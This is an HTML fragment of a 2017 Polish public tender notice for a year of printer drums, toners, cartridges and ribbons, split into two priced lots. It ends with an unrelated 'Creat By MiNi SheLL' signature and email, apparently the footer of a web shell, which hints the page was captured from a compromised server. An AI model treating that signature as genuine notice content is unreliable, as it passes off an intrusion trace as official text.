              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin sukcesywnych dostaw</td><td>20</td></tr><tr><td>posiadanie certyfikatów </td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 08/05/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>dostawa bębnów, folii, taśm i pojemników <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.Bęben do drukarki  Brother HL 5250 DN	5szt
2.Bęben do drukarki  Brother HLL 9200,MFC-L9550CDWT	7szt
3.Bęben do drukarki  Brother MFC 7840w	5szt
4.Bęben do drukarki  Brother MFC 7860w	1szt
5.Bęben do drukarki  Brother MFC 8950, HL 6180	7szt
6.Bęben do drukarki  Brother MFC 9970	5szt
7.Bęben do drukarki  HP 2550	1szt
8.Bęben do drukarki  Hp 4500	1szt
9.Bęben do drukarki  Konica Minolta 2550	1szt
10.Bęben do drukarki  Konica Minolta 5650	1szt
11.Bęben do drukarki  Konica Minolta 5650	1szt
12.Bęben do drukarki  Konica Minolta 5650	1szt
13.Bęben do drukarki  Konica Minolta 5650	1szt
14.Bęben do drukarki  Konica Minolta Bizhub 250/222	3szt
15.Bęben do drukarki  Konica Minolta Bizhub B 223	1szt
16.Bęben do drukarki  Konica Minolta Bizhub B 224e	3szt
17.Bęben do drukarki  Konica Minolta Bizhub C 308	1szt
18.Bęben do drukarki  Konica Minolta Bizhub C 308	1szt
19.Bęben do drukarki  Konica Minolta Bizhub C 308	1szt
20.Bęben do drukarki  Konica Minolta Bizhub C 308	1szt
21.Bęben do drukarki  Konica Minolta C 220	1szt
22.Bęben do drukarki  Konica Minolta C 220	1szt
23.Bęben do drukarki  Konica Minolta C 284e	2szt
24.Bęben do drukarki  Konica Minolta C 284e	2szt
25.Bęben do drukarki  Konica Minolta C650/550	1szt
26.Bęben do drukarki  Konica Minolta C650/550	1szt
27.Bęben do drukarki  Konica Minolta C650/550	1szt
28.Bęben do drukarki  Konica Minolta C650/550	1szt
29.Bęben do drukarki  Kyocera FS 1035MFP/DP   	1szt
30.Bęben do drukarki  Kyocera FS 2020, FS 4020, FS-3040 MFP+	2szt
31.Bęben do drukarki  Kyocera TASKalfa 3051ci	1szt
32.Bęben do drukarki  Lexmark E240n	3szt
33.Bęben do drukarki  Lexmark MS6100N	3szt
34.Bęben do drukarki  Oki B 4250	1szt
35.Bęben do drukarki  Oki B430dn	1szt
36.Bęben do drukarki  Panasonic DP 1520	1szt
37.Bęben do drukarki  Samsung ML CLP 365W	1szt
38.Bęben do drukarki  Samsung ML-4510ND	3szt
39.Bęben do drukarki  Xerox Phaser 7400dn	1szt
40.Bęben do drukarki  Xerox Phaser 7400dn	1szt
41.Bęben do drukarki  Xerox Phaser 7400dn	1szt
42.Bęben do drukarki  Xerox Phaser 7400dn	1szt
43.Bęben do kserokopiarki  Xerox C118	2szt
44.Bęben do telefaxu  Panasonic KX FL613	3szt
45.Bęben do Kyocera fs 8600 dn	1szt
46.Bęben do Kyocera fs 8600 dn	1szt
47.Bęben do Kyocera fs 8600 dn	1szt
48.Bęben do Kyocera fs 8600 dn	1szt
49.Folia do drukarki  Zebra  2824 2,2 Cala 56 Mm	1szt
50.Pojemnik na zużyty toner do Brother HLL 9200,MFC-L9550CDWT	1szt
51.Pojemnik na zużyty toner do Brother MFC 9970	1szt
52.Pojemnik na zużyty toner do HP Color U Enterprise 500 M551n	1szt
53.Pojemnik na zużyty toner do Konica Minolta 5650	1szt
54.Pojemnik na zużyty toner do Kyocera TASKalfa 3051 e	1szt
55.Pojemnik na zużyty toner/tusz do plotera EPSON T7000	1szt
56.Taśma do drukarki  Compuprint SP40	1szt
57.Taśma do drukarki  ENDURO+	4szt
58.Taśma kolorowa 1/2 panela YMCKO 400 wydruków do drukarek Evolis	3szt
59.Taśma żywiczna do drukarki  Zebra GK420	2szt
60.Bęben do drukarki laserowej Lexmark MS811DN	1szt.
61.Bęben do drukarki laserowej Kyocera TASKalfa 4551 ci	1szt.
62.Pojemnik na zużyty tusz do plotera EPSON sc - p8000 std	1szt.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30124300-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  47575.30<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin sukcesywnych dostaw</td><td>20</td></tr><tr><td>posiadanie certyfikatów </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>dostawa cartridgy i tonerów  <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.Cartridge do drukarki  atramentowej Epson photo R 2000	3szt
2.Cartridge do drukarki  atramentowej Epson photo R 2000	3szt
3.Cartridge do drukarki  atramentowej Epson photo R 2000	1szt
4.Cartridge do drukarki  atramentowej Epson photo R 2000	3szt
5.Cartridge do drukarki  atramentowej Epson photo R 2000	3szt
6.Cartridge do drukarki  atramentowej Epson photo R 2000	3szt
7.Cartridge do drukarki  atramentowej Epson photo R 2000	3szt
8.Cartridge do drukarki  atramentowej Epson photo R 2000	3szt
9.Cartridge do drukarki Epson surecolor sc p 600 	5szt
10.Cartridge do drukarki Epson surecolor sc p 600 	5szt
11.Cartridge do drukarki Epson surecolor sc p 600 	5szt
12.Cartridge do drukarki Epson surecolor sc p 600 	5szt
13.Cartridge do drukarki Epson surecolor sc p 600 	5szt
14.Cartridge do drukarki Epson surecolor sc p 600  	5szt
15.Cartridge do drukarki Epson surecolor sc p 600  	5szt
16.Cartridge do drukarki Epson surecolor sc p 600  	5szt
17.Cartridge do drukarki Epson surecolor sc p 600  	5szt
18.Cartridge do drukarki Ricoh Aficio SG 3110DN 	5szt
19.Cartridge do drukarki Ricoh Aficio SG 3110DN 	5szt
20.Cartridge do drukarki Ricoh Aficio SG 3110DN 	5szt
21.Cartridge do drukarki Ricoh Aficio SG 3110DN 	5szt
22.Cartridge do ploter EPSON T7000 	3szt
23.Cartridge do ploter EPSON T7000	3szt
24.Cartridge do ploter EPSON T7000 	3szt
25.Cartridge do ploter EPSON T7000 	3szt
26.Cartridge do ploter EPSON T7000	3szt
27.Cartridge do plotera Canaan Prograf iPF 605	3szt
28.Cartridge do plotera Canaon Prograf iPF 605	3szt
29.Cartridge do plotera Canaon Prograf iPF 605	3szt
30.Cartridge do plotera Canaon Prograf iPF 605	3szt
31.Cartridge do plotera Canaon Prograf iPF 605	3szt
32.Cartridge do plotera Epson Stylus Pro 9000	3szt
33.Cartridge do plotera Epson Stylus Pro 9000	3szt
34.Cartridge do plotera Epson Stylus Pro 9000	3szt
35.Cartridge do plotera Epson Stylus Pro 9000	3szt
36.Cartridge do plotera Epson Stylus Pro 9000	3szt
37.Cartridge do plotera Epson Stylus Pro 9000	3szt
38.Cartridge do plotera Epson surecolor sc-p8000std 	5szt
39.Cartridge do plotera Epson surecolor sc-p8000std 	5szt
40.Cartridge do plotera Epson surecolor sc-p8000std 	5szt
41.Cartridge do plotera Epson surecolor sc-p8000std 	5szt
42.Cartridge do plotera Epson surecolor sc-p8000std 	5szt
43.Cartridge do plotera Epson surecolor sc-p8000std 	5szt
44.Cartridge do plotera Epson surecolor sc-p8000std 	5szt
45.Cartridge do plotera Epson surecolor sc-p8000std 	5szt
46.Cartridge do plotera Epson surecolor sc-p8000std 	5szt
47.Cartridge do plotera Epson surecolor sc T 5200	5szt
48.Cartridge do plotera Epson surecolor sc T 5200	5szt
49.Cartridge do plotera Epson surecolor sc T 5200	5szt
50.Cartridge do plotera Epson surecolor sc T 5200	5szt
51.Cartridge do plotera Epson surecolor sc T 5200	5szt
52.Cartridge  do drukarki  Epson Stylus Pro 4000-C8	3szt
53.Cartridge  do drukarki  Epson Stylus Pro 4000-C8	3szt
54.Cartridge  do drukarki  Epson Stylus Pro 4000-C8	3szt
55.Cartridge  do drukarki  Epson Stylus Pro 4000-C8	3szt
56.Toner do drukarki  Brother HL 5250 DN	1szt
57.Toner do drukarki  Brother HLL 9200,MFC-L9550CDWT	1szt
58.Toner do drukarki  Brother HLL 9200,MFC-L9550CDWT	1szt
59.Toner do drukarki  Brother HLL 9200,MFC-L9550CDWT	1szt
60.Toner do drukarki  Brother HLL 9200JMFC-L9550CDWT	1szt
61.Toner do drukarki  Brother MFC 7840w	1szt
62.Toner do drukarki  Brother MFC 7860w	1szt
63.Toner do drukarki  Brother MFC 8950DW,6180	12szt
64.Toner do drukarki  Brother MFC 9970 CDW	5szt
65.Toner do drukarki  Brother MFC 9970 CDW	5szt
66.Toner do drukarki  Brother MFC 9970 CDW	5szt
67.Toner do drukarki  Brother MFC 9970 CDW	5szt
68.Toner do drukarki  Canon l-Sensys MF 8450	2szt
69.Toner do drukarki  Canon l-Sensys MF 8450	2szt
70.Toner do drukarki  Canon l-Sensys MF 8450	2szt
71.Toner do drukarki  Canon l-Sensys MF 8450	2szt
72.Toner do drukarki  Canon MF 9220CDN	3szt
73.Toner do drukarki  Canon MF 9220CDN	3szt
74.Toner do drukarki  Canon MF 9220CDN	3szt
75.Toner do drukarki  Canon MF 9220CDN	3szt
76.Toner do drukarki  Dell 3115 CN	1szt
77.Toner do drukarki  Dell 3115 CN	1szt
78.Toner do drukarki  Dell 3115 CN	1szt
79.Toner do drukarki  Dell 3115 CN	1szt
80.Toner do drukarki  Hp  2300	2szt
81.Toner do drukarki  Hp  3500	1szt
82.Toner do drukarki  Hp 1020	3szt
83.Toner do drukarki  HP 1102W	5szt
84.Toner do drukarki  Hp 1200	5szt
85.Toner do drukarki  Hp 1300	1szt
86.Toner do drukarki  HP 1536	3szt
87.Toner do drukarki  Hp 2015 	5szt
88.Toner do drukarki  Hp 2100	2szt
89.Toner do drukarki  HP 2605 DN	1szt
90.Toner do drukarki  HP 2605 DN	1szt
91.Toner do drukarki  HP 2605 DN	1szt
92.Toner do drukarki  HP 2605 DN	1szt
93.Toner do drukarki  HP 3150	3szt
94.Toner do drukarki  Hp 3200	1szt
95.Toner do drukarki  Hp 4200	1szt
96.Toner do drukarki  Hp 5100	1szt
97.Toner do drukarki  Hp Color 2800 /2550 Ln	4szt
98.Toner do drukarki  Hp Color 2800 /2550 Ln	4szt
99.Toner do drukarki  Hp Color 2800 /2550 Ln	4szt
100.Toner do drukarki  Hp Color 2800 /2550 Ln	4szt
101.Toner do drukarki  Hp Color 3600	3szt
102.Toner do drukarki  Hp Color 3600	3szt
103.Toner do drukarki  Hp Color 3600	3szt
104.Toner do drukarki  Hp Color 3600	3szt
105.Toner do drukarki  Hp Color 3700	1szt
106.Toner do drukarki  Hp Color 3700	1szt
107.Toner do drukarki  Hp Color 3700	1szt
108.Toner do drukarki  HP Color 4500c	1szt
109.Toner do drukarki  HP Color 4500c	1szt
110.Toner do drukarki  HP Color 4500c	1szt
111.Toner do drukarki  HP Color 4500c	1szt
112.Toner do drukarki  Hp Color Jet 3500	1szt
113.Toner do drukarki  Hp Color Jet 3500	1szt
114.Toner do drukarki  Hp Color Jet 3500,3700	1szt
115.Toner do drukarki  Hp Color U Enterprise 500 M551n	2szt
116.Toner do drukarki  Hp Color U Enterprise 500 M551n	2szt
117.Toner do drukarki  Hp Color U Enterprise 500 M551n	2szt
118.Toner do drukarki  Hp Color U Enterprise 500 M551n	2szt
119.Toner do drukarki  Hp Enterprise 600 M601dn	3szt
120.Toner do drukarki  Konica  Minolta C 220	1szt
121.Toner do drukarki  Konica  Minolta C 220	1szt
122.Toner do drukarki  Konica  Minolta C 220	1szt
123.Toner do drukarki  Konica  Minolta C 220	1szt
124.Toner do drukarki  Konica Minolta 2550dn	1szt
125.Toner do drukarki  Konica Minolta 2550dn	1szt
126.Toner do drukarki  Konica Minolta 2550dn	1szt
127.Toner do drukarki  Konica Minolta 25S0dn	1szt
128.Toner do drukarki  Konica Minolta 5650	2szt
129.Toner do drukarki  Konica Minolta 5650	2szt
130.Toner do drukarki  Konica Minolta 5650	2szt
131.Toner do drukarki  Konica Minolta 5650	2szt
132.Toner do drukarki  Konica Minolta Bizhub  223	3szt
133.Toner do drukarki  Konica Minolta Bizhub  224e	2szt
134.Toner do drukarki  Konica Minolta Bizhub 222 / 250	3szt
135.Toner do drukarki  Konica Minolta Bizhub C 308	3szt
136.Toner do drukarki  Konica Minolta Bizhub C 308	3szt
137.Toner do drukarki  Konica Minolta Bizhub C 308	3szt
138.Toner do drukarki  Konica Minolta Bizhub C 308	3szt
139.Toner do drukarki  Konica Minolta C 284e	2szt
140.Toner do drukarki  Konica Minolta C 284e	2szt
141.Toner do drukarki  Konica Minolta C 284e	2szt
142.Toner do drukarki  Konica Minolta C 284e	2szt
143.Toner do drukarki  Konica Minolta C650/550	1szt
144.Toner do drukarki  Konica Minolta C650/550	1szt
145.Toner do drukarki  Konica Minolta C650/550	1szt
146.Toner do drukarki  Konica Minolta C650/550	1szt
147.Toner do drukarki  Kyocera 3050ci	2szt
148.Toner do drukarki  Kyocera 3050ci	2szt
149.Toner do drukarki  Kyocera 3050ci	2szt
150.Toner do drukarki  Kyocera 3050ci	2szt
151.Toner do drukarki  Kyocera FS 2020 DN	2szt
152.Toner do drukarki  Kyocera FS-3040 MFP+	2szt
153.Toner do drukarki  Kyocera TASKalfa 3051ci	3szt
154.Toner do drukarki  Kyocera TASKalfa 3051ci	3szt
155.Toner do drukarki  Kyocera TASKalfa 3051ci	3szt
156.Toner do drukarki  Kyocera TASKalfa 3051ci	3szt
157.Toner do drukarki  Lexmark E240n	3szt
158.Toner do drukarki  Lexmark MS610DN	5szt
159.Toner do drukarki  OKI  B430dn	1szt
160.Toner do drukarki  OKI B4250	1szt
161.Toner do drukarki  OKI Color A-3 C8600N	1szt
162.Toner do drukarki  OKI Color A-3 C8600N	1szt
163.Toner do drukarki  OKI Color A-3 C8600N	1szt
164.Toner do drukarki  OKI Color A-3 C8600N	1szt
165.Toner do drukarki  Samsung CLP 770ND	2szt
166.Toner do drukarki  Samsung CLP 770ND	2szt
167.Toner do drukarki  Samsung CLP 770ND	2szt
168.Toner do drukarki  Samsung CLP 770ND	2szt
169.Toner do drukarki  Samsung ML CLP 365W	2szt
170.Toner do drukarki  Samsung ML CLP 365W	2szt
171.Toner do drukarki  Samsung ML CLP 365W	2szt
172.Toner do drukarki  Samsung ML CLP 365W	2szt
173.Toner do drukarki  Samsung ML-4510ND	3szt
174.Toner do drukarki  Xerox Phaser 7400dn	1szt
175.Toner do drukarki  Xerox Phaser 7400dn	1szt
176.Toner do drukarki  Xerox Phaser 7400dn	1szt
177.Toner do drukarki  Xerox Phaser 7400dn	1szt
178.Toner do drukarki Kyocera ECOSYS P6035CDN 	2szt
179.Toner do drukarki Kyocera ECOSYS P6035CDN 	2szt
180.Toner do drukarki Kyocera ECOSYS P6035CDN 	2szt
181.Toner do drukarki Kyocera ECOSYS P6035CDN 	2szt
182.Toner do drukarki Kyocera FS 1035MFP/DP   	3szt
183.Toner do drukarki Kyocera FS 4020	2szt
184.Toner do drukarki Kyocera FS C8600DN	1szt
185.Toner do drukarki Kyocera FS C8600DN	1szt
186.Toner do drukarki Kyocera FS C8600DN	1szt
187.Toner do drukarki Kyocera FS C8600DN 	1szt
188.Toner do drukarki Oce VAR 2222C N1U1FX	2szt
189.Toner do drukarki Oce VAR 2222C N1U1FX	2szt
190.Toner do drukarki Oce VAR 2222C N1U1FX	2szt
191.Toner do drukarki Oce VAR 2222C N1U1FX	2szt
192.Toner do kserokopiarki Canon Np.  6112/6512	1szt
193.Toner do kserokopiarki Kyocera Mita Km-1500	1szt
194.Toner do kserokopiarki Kyocera Mita Km-1620	1szt
195.Toner do kserokopiarki Mita DC 1860	1szt
196.Toner do kserokopiarki Panasonic Dp 1520	1szt
197.Toner do kserokopiarki Toshiba 1550	1szt
198.Toner do kserokopiarki Xerox C118	1szt
199.Toner do kserokopiarki Xerox Phaser 3200 MFP	2szt
200.Toner do telefaxu Panasonic KX-FL613	2szt
201.Toner do drukarki Kyocera  esyss p 7040 dn	1szt.
202.Toner do drukarki Kyocera  esyss p 7040 dn	1szt.
203.Toner do drukarki Kyocera  esyss p 7040 dn	1szt.
204.Toner do drukarki Kyocera  esyss p 7040 dn	1szt.
205.Toner do drukarki laserowej Lexmark MS811DN	1szt.
206.Toner do drukarki laserowej Kyocera TASKalfa 4551 ci	1szt.
207.Toner do drukarki laserowej Kyocera TASKalfa 4551 ci	1szt.
208.Toner do drukarki laserowej Kyocera TASKalfa 4551 ci	1szt.
209.Toner do drukarki laserowej Kyocera TASKalfa 4551 ci	1szt.
210.Toner do drukarki laserowej Hp 6p	1	szt.
211.Toner do drukarki laserowej  HP 1100 	1szt.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>30125110-5, 30125120-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  58517.61<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin sukcesywnych dostaw</td><td>20</td></tr><tr><td>posiadanie certyfikatów </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com